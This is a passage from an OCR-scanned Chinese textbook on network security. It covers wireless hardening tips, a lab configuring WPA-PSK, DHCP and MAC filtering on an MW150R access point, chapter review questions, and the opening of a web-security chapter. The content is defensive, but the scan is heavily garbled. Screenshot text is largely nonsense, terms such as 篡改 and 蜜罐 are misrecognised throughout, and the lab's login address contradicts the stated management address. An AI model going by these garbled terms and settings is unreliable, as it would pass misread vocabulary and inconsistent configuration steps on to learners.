不 要 仅仅 依靠 无 线 加 密 手段 来 保证 无 线 网 络 的 整体 安全 。 不 同类 型 的 加 密 可 以 在 系统 
层面 上 提高 安全 的 可 靠 性 。 例 如 ,OpenSSH 就 是 一 个 不 错 的 选择 ,可 以 为 在 同一 网 络 内 的 
系统 提供 安全 通信 ,即使 需要 经 过 因特网 也 没有 问题 。 采 用 加 密 技 术 来 保护 无 线 网 络 中 的 
所 有 通信 数据 不 被 窃取 是 非常 重要 的 ,就 像 采用 了 SSL 加 密 技术 的 电子 商务 网 站 一 样 。 

5. 对 介质 访问 控制 (MAC) 地 址 进行 控制 

很 多 人 会 告诉 你 ,介质 访问 控制 (MAC) 地 址 的 限制 不 会 提供 真正 的 保护 。 但 是 , 像 隐 
藏 无 线 网 络 的 服务 集合 标识 符 ,限制 介质 访问 控制 (MAC) 地 址 对 网 络 的 访问 ,是 可 以 确保 
网 络 不 会 被 初级 的 恶意 攻击 者 骚扰 的 。 对 于 整个 系统 来 说 ,针对 从 专家 到 新 手 的 各 种 攻击 
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进行 全 面 防护 ,以 保证 系统 安全 的 无 懈 可 击 是 非常 重要 的 。 

6. 在 网 络 不 使 用 的 时 间 , 将 其 关闭 

这 个 建议 的 采用 与 否 ,取决 于 网 络 的 具体 情况 。 如 果 你 并 不 是 需要 一 天 24 小 时 每 周 
7 天 都 使 用 网 络 , 那 就 可 以 采用 这 个 措施 。 毕 竞 , 在 网 络 关闭 的 时 间 , 安 全 性 是 最 高 的 , 没 人 
能 够 连接 不 存在 的 网 络 。 

7. 关闭 无 线 网 络 接口 

如 果 你 使 用 笔记 本 电脑 之 类 的 移动 终端 的 话 , 应 该 将 无 线 网 络 接口 在 默认 情况 下 给 予 
关闭 。 只 有 确实 需要 连接 到 一 个 无 线 网 络 的 时 间 才 打开 相关 的 功能 。 其 余 的 时 间 ,关闭 的 
无 线 网 络 接口 让 你 不 会 成 为 恶意 攻击 的 目标 。 

8. 对 网 络 入 侵 者 进行 监控 

对 于 网 络 安全 的 状况 ,必须 保持 全 面 关 注 。 你 需要 对 攻击 的 发 展 趋势 进行 跟踪 ,了 解 恶 
意 工 具 是 怎么 连接 到 网 络 上 的 ,怎么 做 可 以 提供 更 好 的 安全 保护 。 你 还 需要 对 日 志 里 扫描 
和 访问 的 企图 等 相关 信息 进行 分 析 , 找 出 其 中 有 用 的 部 分 ,并 且 确 保 在 真正 的 异常 情况 出 现 
的 时 间 可 以 给 予 及 时 的 通知 。 众 所 周知 ,最 危险 的 时 间 就 是 事情 进行 到 一 半 的 时 间 。 

9. 确保 核心 的 安全 

在 你 离开 的 时 间 ,务必 确保 无 线路 由 器 或 连接 到 无 线 网 络 上 正在 使 用 的 笔记 本 电脑 上 
运行 了 有 效 的 防火 墙 。 还 要 注意 的 是 ,请 务必 关闭 不 必要 的 服务 ,特别 是 在 微软 Windows 
操作 系统 下 不 需要 的 服务 ,因为 在 默认 情况 下 它们 活动 的 后 果 可 能 会 出 乎 意料 。 实 际 上 ,你 
要 做 的 是 尽 一 切 可 能 确保 整个 系统 的 安全 。 

除了 以 上 这 些 措施 ,还 可 以 采用 以 下 措施 : 采用 端口 访问 技术 (802. 1x) 进 行 控制 ,防止 
非 授 权 的 非法 接 人 和 访问 ; 对 于 密度 等 级 高 的 网 络 采用 VPN 进行 连接 ; 修改 缺 省 的 AP 密 
码 ; 布置 AP 的 时 候 要 在 公司 办 公 区 域 以 外 进行 检查 ,防止 AP 的 覆盖 范围 超出 办 公 区 域 
(难度 比较 大 ) ,同时 要 让 保安 人 员 在 公司 附近 进行 巡查 ,防止 外 部 人 员 在 公司 附近 接 人 网 
络 ; 禁止 员工 私自 安装 AP, 通 过 便携 机 配置 无 线 网 卡 和 无 线 扫描 软件 可 以 进行 扫描 ; 如 果 
网 卡 支持 修改 属性 需要 密码 功能 ,要 开启 该 功能 ,防止 网 卡 属性 被 修改 ; 配置 设备 检查 非法 
进入 公司 的 2.4GHz 电磁 波 发 生 器 ,防止 被 干扰 和 DoS; 制定 无 线 网 络 管理 规定 ,规定 员工 
不 得 把 网 络 设置 信息 告诉 公司 外 部 人 员 ; 禁止 设置 P2P 的 Ad hoc 网 络 结构 ; 跟踪 无 线 网 
络 技术 ,特别 是 安全 技术 (如 802. 11i 对 密 钥 管理 进行 了 规定 ), 对 网 络 管理 人 员 进 行 知识 培 
训 等 都 可 以 作为 无 线 网 络 安全 防范 措施 。 


《ED 组 建安 全 的 无 线 网 络 一 WPA-PSK 


/ 实 训 目的 
掌握 如 何 使 用 WPA-PSK 模式 来 部 署 安 全 的 无 线 网 络 。 
/ 实 训 内 容 


假定 你 是 某 网 络 公司 的 技术 工程 师 , 公 司 部 署 了 无 线 网 络 , 由 于 共享 密 钥 容易 被 人 破 
解 , 因 此 公司 决定 采用 WPA-PSK 的 验证 方式 。 
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无 线 AP 作为 DHCP 服务 器 ,自动 为 无 线 PC 分 配 IP 地 址 ,分 配 的 IP 地 址 范围 为 : 
192. 168. 1. 100/24 一 192. 168. 1. 200/24。 


/ 实 训 设备 


(1) 带 802. 11g 无 线 网 卡 的 笔记 本 两 台 或 PC 两 台 , 以 及 802. 11g 无 线 外 置 USB 网 卡 
两 块 。 


(2) 无 线 LAN 接 人 器 一 台 。( 本 例 设备 MW150R ,管理 地 址 为 192. 168. 1. 254) 。 
(3) 网 线 一 根 。 


V/ 实 训 步 要 


(1) 设置 PC1 的 以 太 网 接口 地 址 为 192. 168. 1. 10/24, 因 为 MW150R 的 管理 地 址 默认 
为 192.168. 1. 254/24, 如 图 9-6 所 示 。 


Internet 协议 (ICP/IP) 属性 
常规 


加 果 网 络 支 持 此 功能 ， 则 可 以 获取 自动 指派 的 IP 设置。 否则， 
从 网 络 系 统管 理 得 适当 的 IF 设置 。 


人 自动 获得 IP 地 址 @) 
全 使 用 下 面 的 IP 地 址 GE) 
J? 地 址 GD): 
子 网 掩 码 QD): 


默认 网 关 四 ): 


自动 艾 揭 DNS 服务 器 地 址 中 ) 
全 使 用 下 面 的 DNS 服务 器 地 址 也) : 
首选 DNS 服务 器 中 ): 
备用 DNS 服务 器 (A) 


图 9-6 PC1 的 以 太 网 接口 地 址 设置 


(2) 从 IE 浏览 器 中 输入 http://192.168.0.1, 登 录 到 MW150R 的 管理 界面 ,输入 默认 
密码 为 default, 如 图 9-7 所 示 。 


版 本 信息 


当前 软件 版 本 :4.17.7 Build 110314 Rel.41712n 
当前 硬件 版 本 : 。 WY150R 5.0 00000000 


LNN 品 状态 
BAC 地址 : 40-16-9F-D2-62-64 
地 址 : 192. 168. 1.254 
子 网 掩 码 : 255. 255. 255.0 


图 9-7 MW150R 的 管理 界面 
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(3) 在 无 线 设置 中 的 无 线 网 络 基本 设置 里 ,设置 SSID 号 为 AP-Z1 ,无 线 模式 为 "11bgn 
mixed”(802. 11b、g、n) ,信道 为 “6”, 频 段 带宽 为 “自动 ”", 选 中 “开启 无 线 功 能 "和 “开启 SSID 
广播 " 复 选 框 。 设 置 完 毕 后 保存 ,如 图 9-8 所 示 。 


无 线 网 络 基 本 设置 
本 页 面 设置 路 由 器 无 线 网 络 的 基本 考 数 。 
SSID 号 : CE 
信道 : 5 国 
模式 : liben nixed 图 | 
频 肥 融 宫 : | 88 国 
加 开局 无 线 功能 
回 开局 ssID 广 播 
口 开局 ms 
模 劲 


图 9-8 无 线 网 络 的 基本 设置 


(4) 用 无 线 AP 做 DHCP 服务 器 ,自动 为 无 线 PC 分 配 耳 地 址 。 配 置 ~DHCP 服务 器 一 
启用 DHCP 服务 器 一 修改 起 始 及 结束 IP, 然 后 单 击 “ 保 存 ” 按 钮 ,如 图 9-9 所 示 。 


DHCP 服 务 
本 路 由 器 内 建 的 DHCP 服 务 器 能 自动 配置 局 域 网 中 各 计算 机 的 TCF/IF 协 议 。 
TDHC7 服 务 器 ; 加 不 自用 加 所 用 
地 址 池 开 始 地 址 : [192. 168.1. 100 
地 址 池 结 束 地 址 : [192. 168. 1. 200 
地 址 租 期 : 120 ] 分 钟 〔1~2880 分 钟 ， 缺 省 为 120 分 钟 
网 关 : 0.0.00 (可 选 ? 
缺 省 域名 : |) 
主 DNS 服 务 器 : 0.0.0.0 《可 选 ? 
备用 DNS 服务 器 : [0.0.0.0 《可 选 ? 


[保存 | [更 肌 
图 9-9 AP 做 DHCP 服务 器 设置 


(5) 配置 无 线 AP 加 密 方式 ,在 “无 线 设置 ">“ 安 全 设置 "界面 配置 如 图 9-10 所 示 。 网 
络 鉴证 方式 : MW150R 提供 的 网 络 认 证 有 开放 (自动 ) .共享 密 钥 `WPA-PSK 、WPA 等 。 本 
例 使 用 WPA-PSK 。 

@ 开放 (自动 ): 开放 系统 不 需要 认证 ,因为 它 不 执行 任何 安全 检测 就 允许 所 有 设备 加 
入 网 络 。 

@ 共享 密 钥 : 共享 密 钥 要 求 进入 点 和 终端 间 WEP 密 钥 相同 时 , 才 允 许 终端 加 入 网 络 。 

@ WPA-PSK: 用 比 WEP 加 密 更 加 安全 的 方式 让 无 线 站 点 与 AP 通信 。 选 择 WPA- 
PSK 模式 可 以 提高 数据 传输 的 安全 性 。AP 提供 的 WPA-PSK 是 使 用 预 设 的 密 钥 模式 ,不 
需要 Radius。 

@ WPA: 用 比 WPA-PSK 加 密 更 加 安全 的 方式 让 无 线 站 点 与 AP 通信 。 选 择 WPA 
模式 可 以 提高 数据 传输 的 安全 性 ,但 需要 Radius 支持 。 此 时 ,可 以 选择 启用 “ 密 钥 更 新 邮 
期 "功能 ,建议 使 用 默认 配置 。 
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安全 提示 : 为 保障 网 络 安全 ， 强 烈 推荐 开局 安全 设置 ， 并 使 用 WA- 
PSK/WPA2-PSK AES 加 密 方 法 。 
〇 不 开局 无 战 安全 
© WPA-PSK/YPA2-PSK 
认证 类 型 : Ti- 国 
加 密 算法 : is 国 | 
FSK 密码 : T7561ap-zl 

(8-63 个 ASCII 码 字符 或 8-64 个 十 六 进 制 字 符 ) 
组 密 钥 更 新 Wi: [0 ] 
《 单位 为 秒 ， 最 小 值 为 30 ,不 更 新 则 为 0 》 
© rmPMWPMZ 
认证 类 型 : 本 国 
加 密 算法 : | 助 图 
Radius 服 务 器 IP : 
Radius 请 口 : 1812 | 〔〈1- 85535，0 表 示 默 认 端 口 : 1812 ) 
Radius 人 密码 ; 
姐 密 钥 更 新 周期 : 86400 
(单位 为 秒 ,最 小 值 为 30 ,不 更 新 则 为 0》 


图 9-10 配置 无 线 AP 加 密 方式 


(6) 无 线 网 络 MAC 地 址 过 滤 。 可 以 设置 MAC 地 址 过 滤 规则 
MAC 地 址 连接 到 AP, 实 现 安全 控制 。 本 例 设置 如 图 9-11 所 示 。 


无 厂 网 络 IAC 地 址 过 小 设置 


过 滤 规 则 


本 页 设置 WC 地 址 过 小 来 控制 计算 机 对 本 无 训 网 络 的 访问 。 
WA 地 直 过 涛 功能 : 已 开局 


名 等 止 列表 中 生效 的 MAC 地址 访问 本 无 线 网 络 
@ 人 允许 列表 中 生效 的 WAE 地 址 访问 本 无 线 网 络 


,允许 或 禁止 一 部 分 


om MAC 地 址 
1 | 49-50-60-E3-DA-68 | 4 


BE] 所 有 条 目 生效 | [所 有 条 目 天 效 “] [ 三 只 所 有 条 目 


9-11 


MAC 地 址 过 滤 设 置 


(7) 连接 AP。 开 启 PC 无 线 网 络 功 能 ,搜索 无 线 网 络 , 选 中 “AP-Z1”, 单 击 “ 连 接 ” 按 钮 ， 
输入 密 钥 “7561ap-z1”, 单 击 “ 连 接 ” 按 钮 ,如 图 9-12 所 示 。 其 连接 结果 如 图 9-13 所 示 。 


无 线 网 络 连 接 


网 这 “他 -zlw 要 求 网 结 密 负 他 部 作 EP 密 旬 或 和 TA 宫 铜 )。 同 络 守 铀 玫 助 明 上 未 
ee i 


网 络 密 角 中); 
确认 网 络 密 外 人 ) 


图 9-12 


Er 


PC 无 线 网 络 连接 
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无 线 网 络 连 持 
同 络 任务 选择 无 线 网 络 
借 N 网 结 列表 单 击 以 下 列 吉 中 的 顺 目 以 连接 到 区 域内 的 无 线 问 络 或 获 神 更 多 信息 呈 )。 


0 | Er 


六 启用 安全 的 无 贱 网 络 QWPA2) 


| 
相关 任务 Ca 
了 和 疗 牛 用 安全 的 无 线 网 络 (Fh2) 


” P ET 
ro 忆 所 用 安全 的 无 二 网 络 Ph2) 
> 更 BR 高 弧 设置 人 EECUERT_ 440970 
站 启用 安全 的 无 线 网 络 GTA2) 
人 TP-LIIE-abecd 
于 自用 安全 的 无 乒 同 络 GIFA) 


| 9y yhz 


图 9-13 PC 无 线 网 络 连接 结果 
查看 无 线 网 卡 : 开启 DOS 界面 ,输入 IPCONFIG , 回 车 ,网 络 信息 如 图 9-14 所 示 。 


图 9-14 网 络 信息 


(8) ping 测试 PC1、PC2 的 联通 。 结 果 如 下 所 示 。 


C:\Documents and Settings\Administrator > ping 192.168.1.101 
Pinging 192.168.1.101 with 32 bytes of data: 

Reply from 192.168.1.101: bytes = 32 time = 2ms TIL = 64 

Reply from 192.168.1.101: bytes = 32 time= lms TIL= 64 

Reply from 192.168.1.101: bytes = 32 time = 4ms TIL = 64 

Reply from 192.168.1.101: bytes = 32 time = 2ms TTL = 64 


【注意 事项 】 

(1) MW150R 的 物理 连 线 要 正确 。 

(2) 当 无 线 接 入 点 设置 网 络 鉴 证 方式 和 密 钥 后 ,和 无 线 接 入 点 连接 的 无 线 网 卡 也 必须 
使 用 相同 的 网 络 鉴证 方式 和 密 钥 ; 否则 它们 不 能 建立 连接 或 通信 。 


本 章 小 结 


(1) 无 线 局 域 网 是 指 以 无 线 信道 作为 传输 媒介 的 计算 机 局 域 网 。 本 节 介 绍 无 线 网 络 安 
全 的 基本 概念 ,以 及 无 线 网 络 存在 的 安全 性 问题 的 主要 表现 。 在 无 线 局 域 网 里 ,常见 的 设备 
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主要 有 无 线 网 卡 、 无 线 网 桥 、 无 线 天 线 、AP 接 入 点 等 。 

(2) 目前 国际 上 有 三 大 标准 家 族 , 它 们 是 美国 IEEE 802. 11 家 族 、 欧 洲 ETSI 高 性 能 局 
域 网 HiperLAN 系列 和 日 本 ARIB 移动 多 媒体 接 人 通信 MMAC。 其 他 类 似 标准 还 有 美国 
HomeRF 共享 无 线 接 人 协议 SWAP。 

(3) 介绍 了 无 线 网 络 安全 协议 ,主要 有 : 解决 无 线 局 域 网 络 安全 问题 ,网 络 安全 专家 先 
后 提出 了 有 线 等 效 保密 (WEP) 方 案 ; 过 渡 期 间 的 Wi-Fi 保护 存 取 (WPA) 标 准 和 已 成 为 新 
标准 的 802. 11i; 我 国 在 2003 年 5 月 提出 的 无 线 局 域 网 鉴别 和 保密 基础 结构 (WAPI) 国 家 
标准 GB 15629. 11。 现 在 ,无 线 局 域 网 络 安全 已 经 得 到 很 大 程度 的 改善 ,但 是 要 真正 构建 端 
到 端的 安全 无 线 网 络 依然 任重道远 。 

(4) 无 线 网 络 的 安全 技术 主要 有 服务 集 标 识 符 SSID。SSID 是 相 邻 的 无 线 接 人 点 (AP) 
区 分 的 标志 ,无 线 接 入 用 户 必须 设 定 SSID 才能 和 AP 通信 。 尝 试 连接 到 无 线 网 络 的 系统 在 
被 允许 进入 之 前 必须 提供 SSID, 这 是 唯一 标识 网 络 的 字符 串 。 所 以 可 以 认为 SSID 是 一 个 
简单 的 口令 ,提供 了 口令 认证 机 制 ,实现 了 一 定 的 安全 性 。 

(5) 无 线 网 络 所 面临 的 安全 威胁 主要 有 以 下 几 类 : 网 络 窃听 、AP 中 间 人 欺骗 、WEP 破 
解 .MAC 地 址 欺骗 .窃取 网 络 资源 。 基 于 以 上 无 线 网 络 存在 的 诸多 安全 隐患 ,采取 下 面 几 
种 对 无 线 网 络 安全 技术 实现 的 措施 ,包括 采用 强力 的 密码 .严禁 广播 服务 集合 标识 符 
(SSID) ,采用 有 效 的 无 线 加 密 方式 ,可 能 的 话 ,采用 不 同类 型 的 加 密 、 对 介质 访问 控制 
(MAC) 地 址 进行 控制 ,在 网 络 不 使 用 的 时 间 , 将 其 关闭 .关闭 无 线 网 络 接口 .对 网 络 入 侵 者 
进行 监控 ,确保 核心 的 安全 。 


1. 简 述 WLAN。 

2. 常用 的 无 线 网 络 设备 有 哪些 ? 

3. 简 述 IEEE 802. 11a 和 IEEE 802. 11b 的 不 同 。 
4. 简 述 WEP 协议 。 

5. 简 述 WEP 缺陷 。 

6. 简 述 WAPI 协议。 

7. 什么 是 SSID? 

8. 无 线 网 络 的 安全 缺陷 主要 有 哪些 ? 

9. 无 线 网 络 的 安全 防范 措施 主要 有 哪些 ? 
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应 用 系统 的 安全 技术 是 指 在 应 用 层面 上 解决 信息 交换 的 机 密 性 和 完整 性 ,防止 在 信息 
交换 过 程 中 数据 被 非法 窃听 和 算 改 的 技术 。 


10.1 Web 安全 技术 


Web 页 面 为 用 户 提 供 了 网 络 应 用 系统 的 接口 及 海量 的 多 媒体 信息 (包括 文字 、 音 频 、 视 
频 信 息 ), 透 过 Web 页 ,人 们 可 以 从 事 海量 知识 和 信息 的 检索 、 网 络 办 公 及 网 络 交 易 等 日 常 
的 工作 学习、 娱乐 活动 。 然 而 ,有 些 人 受 利益 驱动 ,利用 了 人 们 上 网 的 心理 和 Web 本 身 存 
在 的 漏洞 ,进行 违法 犯罪 活动 。 


10.1.1 Web 概述 


1.Web 组 成 部 分 

Web 最 初 是 以 开发 一 个 人 类 知识 库 为 目标 ,并 为 某 一 项 目的 协作 者 提供 相关 信息 及 交 
流 思想 的 途径 。Web 的 基本 结构 是 采用 开放 式 的 客户 /服务 器 结构 (Client/Server) ,它们 之 
间 利 用 通信 协议 进行 信息 交互 。 

(1) 服务 器 端 (Web 服务 器 ) 。 在 服务 器 结构 中 规定 了 服务 器 的 传输 设 定 、 信 息 传 输 格 
式 及 服务 器 本 身 的 基本 开放 结构 。Web 服务 器 是 驻 留 在 服务 器 上 的 软件 , 它 汇集 了 大 量 的 
信息 。Web 服务 器 的 作用 就 是 管理 这 些 文档 , 按 用 户 的 要 求 返回 信息 。 

(2) 客户 端 (Web 浏览 器 ) 。 客 户 端 通常 称 为 Web 浏览 器 ,用 于 向 服务 器 发 送 资源 请 
求 , 并 将 接收 到 的 信息 解码 显示 。Web 浏览 器 是 客户 端 软件 , 它 从 Web 服务 器 上 下 载 和 获 
取 文件 ,翻译 下 载 文件 中 的 HTML 代码 ,进行 格式 化 ,根据 HTML 中 的 内 容 在 屏幕 上 显示 
信息 。 如 果 文 件 中 包含 图 像 及 其 他 格式 的 文件 (如 声 频 、 视 频 、Flash 等 ), Web 浏览 器 会 做 
相应 的 处 理 或 依据 所 支持 的 插件 进行 必要 的 显示 。 常 用 的 浏览 器 有 IE、Firefox、Google 
Chrome、Opera、\ 世 界 之 窗 、Netscape 等 。 

(3) 通信 协议 (HTTP)。Web 浏览 器 与 服务 器 之 间 遵 循 HTTP 进行 通信 传输 。 超 文 
本 传输 协议 (Hyper Text Transfer Protocol, HTTP) 是 分 布 式 的 Web 应 用 的 核心 技术 协 
议 , 它 定义 了 Web 浏览 器 向 Web 服务 器 发 送 索取 Web 页 面 请 求 的 格式 ,以 及 Web 页 面 在 
Internet 上 的 传输 方式 。Web 服务 器 通过 Web 浏览 器 与 用 户 交 互 操 作 , 相 互 间 采用 HTTP 
通信 (服务 器 和 客户 端 都 必须 安装 HTTP) 。 

2. Web 安全 问题 

Web 的 初始 目的 是 提供 快捷 服务 和 直接 访问 ,所 以 早期 的 Web 没有 考虑 安全 性 问题 。 
随 着 Web 的 广泛 应 用 ,Internet 中 与 Web 相关 的 安全 事故 正成 为 目前 所 有 事故 的 主要 组 成 
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部 分 。 

随 着 Web 2.0、 社 交 网 络 、 微 博 等 一 系列 新 型 互联 网 产品 的 诞生 ,基于 Web 环境 的 互联 
网 应 用 越 来 越 广泛 ,企业 信息 化 的 过 程 中 各 种 应 用 都 架设 在 Web 平台 上 ,Web 业务 的 迅速 
发 展 也 引起 黑客 们 的 强烈 关注 , 接 题 而 至 的 就 是 Web 安全 威胁 的 凸显 ,黑客 利用 网 站 操作 
系统 的 漏洞 和 Web 服务 程序 的 SQL 注入 漏洞 等 得 到 Web 服务 器 的 控制 权限 , 轻 则 算 改 网 
页 内 容 , 重 则 窃取 重要 内 部 数据 ,更 为 严重 的 则 是 在 网 页 中 植 和 人 恶意 代码 ,使 得 网 站 访问 者 
受到 侵害 。 

美国 麻 省 理工 学 院 (MIT)2018 年 1 月 发 布 报告 称 全 球面 临 的 网 络 安全 威胁 主要 有 以 
下 几 种 。 

(1) 持 有 公众 敏感 信息 的 企业 将 成 为 黑客 重点 攻击 目标 。 

(2) 云端 勒索 软件 可 能 更 加 猩 儿 。 

(3) 人 工 智 能 和 机 器 学 习 技术 将 提升 黑客 投放 假 消息 的 能 力 。 

(4) 针对 电网 .运输 系统 等 国家 关键 基础 设施 的 网 络 攻击 将 会 增多 。 

(5) 大 量 计算 机 可 能 被 黑客 软件 绑架 ,用 于 挖掘 比特 币 等 加 密 货币 。 

为 了 深入 了 解 国内 用 户 应 对 Web 安全 威胁 的 现状 ,帮助 他 们 找 出 隐患 、 提 高 防范 能 力 ， 
国内 领先 的 中 文 IT 技术 网 站 51CTO. com 特别 做 了 “Web 安全 威胁 在 线 调查 ”活动 ,邀请 广 
大 用 户 参 与 线 上 调查 ,为 当前 Web 安全 及 威胁 现状 提供 更 为 有 力 的 数据 依据 。 本 次 调查 按 
照 问卷 形式 进行 ,分 3 个 主题 ,共有 14 道 调查 选项 ,由 51CTO. com 安全 频道 和 业内 相关 专 
家 共同 拟定 。 分 别 调查 用 户 在 “网 站 安全 ”IM 即时 通信 安全 ”邮件 安全 ”3 个 方面 的 安全 
现状 。 根 据 用 户 所 选项 的 比重 ,将 安全 状况 分 为 3 个 等 级 ,如 图 10-1 所 示 。 


低 度 风险 
10.0% 


中 度 风险 
26.4% 


高 度 风险 
63.6% 


图 10-1 企业 总 体 Web 安全 风险 等 级 分 布 


(1) 低 度 风险 : 防护 较为 完善 ,遭遇 Web 威胁 的 可 能 性 较 低 。 

(2) 中 度 风险 : 可 能 存在 有 明显 漏洞 ,有 较 大 可 能 性 遭遇 Web 威胁 。 

(3) 高 度 风险 : 存在 较 大 安全 隐患 ,很 有 可 能 被 人 侵 ,严重 情况 下 可 能 会 造成 关键 数据 
丢失 。 

“网 站 安全 ”偏重 于 调查 用 户 网 站 安全 威胁 和 IT 管理 人 员 的 技术 能 力 。 调 查 显 示 , 目 前 
用 户 在 网 站 安全 管理 方面 已 经 有 了 相当 的 重视 。62.2% 的 用 户 具备 专业 的 运 维 团 队 在 保护 网 
站 安全 ,其 中 更 有 8.1% 的 用 户 定期 外 请 专业 安全 服务 团队 做 检查 加 固 等 ; 但 也 有 29.7% 的 
网 站 处 于 无 人 看 管 的 处 境 , 毫 无 疑问 ,这 些 网 站 往往 是 被 最 先 攻 陷 的 。 

综合 分 析 可 以 看 出 ,当前 用 户 对 网 站 安全 威胁 普遍 担忧 ,对 用 户 来 说 ,怎样 合理 、 有 效 地 
保障 网 站 安全 是 Web 安全 中 令 大 多 数 人 困惑 的 事情 。 总 体 看 来 ,可 以 发 现 我 国 用户 面 临 的 
Web 安全 威胁 是 非常 严重 的 ; 而 一 旦 出 现 网 站 挂 马 、 病 毒 暴发 ,人 侵 攻击 等 问题 ,完全 有 可 
能 马上 造成 灾难 性 后 果 。 考 虑 到 目前 用 户 正常 业务 对 网 络 的 依存 度 日 益 严 重 ,这 种 后 果 更 
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让 人 感到 迫在眉睫 。 
10.1.2 Web 安全 目标 


Web 安全 目标 主要 分 为 以 下 3 个 方面 。 

(1) 保护 Web 服务 器 及 其 数据 的 安全 。Web 服务 器 安全 是 指 系统 持续 不 断 、 稳 定 、 可 
靠 地 运行 ,保证 Web 服务 器 提供 可 靠 的 服务 ;未 经 授权 不 得 访问 服务 器 ,保证 服务 器 不 被 非 
法 访问 ;系统 文件 未 经 授权 不 得 访问 ,从 而 避免 引起 系统 混乱 。Web 服务 器 的 数据 安全 是 
指 存储 在 服务 器 里 的 数据 和 配置 信息 未 经 授权 不 能 窃取 、 算 改 和 删除 ;只 允许 授权 用 户 访问 
Web 发 布 的 信息 。 

(2) 保护 Web 服务 器 和 用 户 之 间 传 递 信息 的 安全 。 保 护 Web 服务 器 和 用 户 之 间 传 递 
信息 的 安全 主要 包括 3 个 方面 的 内 容 : 第 一 ,必须 确保 用 户 提供 给 Web 服务 器 的 信息 (用 
户 名 、 密 码 、 财 务 信息 、 访 问 的 网 页 名 等 ) 不 被 第 三 方 所 窃听 、 自 改 和 破坏 ; 第 二 ,对 从 Web 
服务 器 端 发 送 给 用 户 的 信息 要 加 以 同样 的 保护 ; 第 三 ,用 户 和 服务 器 之 间 的 链 路 也 要 进行 
保护 ,使 得 攻击 者 不 能 轻易 地 破坏 该 链 路 。 

(3) 保护 终端 用 户 计算 机 及 其 他 连 入 Internet 的 设备 的 安全 。 保 护 终端 用 户 计算 机 的 
安全 是 指 保证 用 户 使 用 的 Web 浏览 器 和 安全 计算 平台 上 的 软件 不 会 被 病毒 感染 或 被 恶意 
程序 破坏 ; 确保 用 户 的 隐私 和 私人 信息 不 会 遭 到 破坏 。 保 护 连 入 Internet 设备 的 安全 , 主 
要 是 保护 诸如 路 由 器 、 交 换 机 的 正常 运行 , 免 遭 破坏 ; 保证 不 被 黑客 安装 监控 及 后 门 程序 。 


10.1.3 ”Web 安全 技术 的 分 类 


Web 安全 技术 主要 包括 Web 服务 器 安全 技术 、Web 应 用 服务 安全 技术 和 Web 浏览 器 
安全 技术 三 类 。 

1. Web 服务 器 安全 技术 

当前 , Web 服务 器 存在 的 安全 威胁 有 端口 扫描 、Ping 扫射 NetBIOS 和 服务 器 消息 块 
(SMB) 枚 举 、 拒 绝 服务 攻击 (DoS) 未 授权 访问 、 任 意 代码 执行 与 特权 提升 ,病毒 .里 虫 和 特 
洛 伊 木 马 等 。 为 了 应 对 日 益 严 重 的 网 络 安全 威胁 ,必须 提高 Web 服务 器 的 安全 保障 能 力 ， 
防止 恶意 攻击 ,提高 服务 器 防 算 改 与 自动 修复 能 力 。 

Web 防护 可 通过 多 种 手段 实现 ,这 主要 包括 安全 配置 Web 服务 器 、 网 页 防 算 改 技术 、 
反 向 代理 技术 和 蜜 钠 技 术 等 。 

(1) 安全 配置 Web 服务 器 。 充 分 利用 Web 服务 器 本 身 拥有 的 诸如 主 目录 权限 设 定 、 用 户 
访问 控制 ,IP 地 址 许可 等 安全 机 制 , 进 行 合 理 、 有 效 的 配置 ,确保 Web 服务 的 访问 安全 。 

(2) 网 页 防 算 改 技术 。 将 网 页 监控 与 恢复 结合 在 一 起 ,通过 对 网 站 的 页 面 进行 实时 监控 ， 
主动 发 现 网 页 页 面 内 容 是 否 被 非法 改动 ,一 旦 发 现 被 非法 算 改 ,可 立即 恢复 被 算 改 的 网 页 。 

(3) 反 向 代理 技术 。 当 外 网 用 户 访问 网 站 时 ,采用 代理 与 缓存 技术 ,使 得 访问 的 是 反 向 
代理 系统 ,无 法 直接 访问 Web 服务 器 系统 ,因此 也 无 法 对 Web 服务 器 实施 攻击 。 反 向 代理 
系统 会 分 析 用 户 的 请 求 , 以 确定 是 直接 从 本 地 缓存 中 提取 结果 还 是 把 请 求 转发 到 Web 服务 
器 。 由 于 代理 服务 器 上 不 需要 处 理 复 杂 的 业务 逻辑 ,因此 代理 服务 器 本 身 被 人 侵 的 机 会 几 

(4) 蜜 饶 技 术 。 蜜 锥 系统 通过 模拟 Web 服务 器 的 行为 ,可 以 判别 访问 是 否 对 应 用 服务 
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器 及 后 台数 据 库 系统 有 害 ,能 有 效 地 防范 各 种 已 知 及 未 知 的 攻击 行为 。 

2. Web 应 用 服务 安全 技术 

经 过 20 多 年 的 发 展 , Web 应 用 服务 已 经 由 原来 简单 的 信息 服务 拓展 到 诸如 电子 商务 、 
电子 政务 .在线 办 公 、 在 线 视 频 、 网 络 银行 等 多 样 化 的 应 用 服务 。Web 应 用 服务 的 业务 流程 
变 得 相当 复杂 和 多 样 化 ,因此 ,除了 上 述 的 Web 服务 器 安全 技术 保障 之 外 ,在 具体 的 应 用 业 
务 当 中 引入 安全 技术 是 十 分 必要 的 ,主要 包括 身份 认证 技术 .访问 控制 技术 、 数 据 保护 技术 
和 安全 代码 技术 。 

(1) 身份 认证 技术 : 身份 认证 作为 电子 商务 、 网 络 银行 应 用 中 最 重要 的 安全 技术 ,目前 
主要 有 简单 身份 认证 (账号 /口令 ) ,强度 身份 认证 ( 公 钥 / 私 钥 ) 和 基于 生物 特征 的 身份 认证 
3 种 形式 。 

(2) 访问 控制 技术 : 指 通过 某 种 途径 ,准许 或 者 限制 访问 能 力 和 范围 的 一 种 方法 。 通 
过 访问 控制 技术 可 以 限制 对 关键 资源 和 敏感 数据 的 访问 ,防止 非法 用 户 的 入侵 和 合法 用 户 
的 误 操 作 所 导致 的 破坏 。 

(3) 数据 保护 技术 : 主要 采用 的 是 数据 加 密 技术 。 

(4) 安全 代码 技术 : 指 在 应 用 服务 代码 编写 过 程 中 引入 安全 编程 的 思想 ,使 得 编写 的 
代码 免 受 隐藏 字段 攻击 ` 滋 出 攻击 、 参 数 簧 改 攻击 的 技术 。 

3. Web 浏览 器 安全 技术 

Web 浏览 器 是 一 种 应 用 程序 , 它 的 基本 功能 是 把 GUI( 图 形 用 户 界 面 ) 请 求 转换 为 
HTTP 请 求 , 并 把 HTTP 响应 转换 为 GUI 显示 内 容 。 随 着 WWW 使 用 的 增长 及 广泛 分 布 
的 特性 ,Web 浏览 器 的 使 用 引入 了 那些 从 未 被 业界 发 现 的 全 新 客户 机 的 危险 。 黑 客 现在 可 
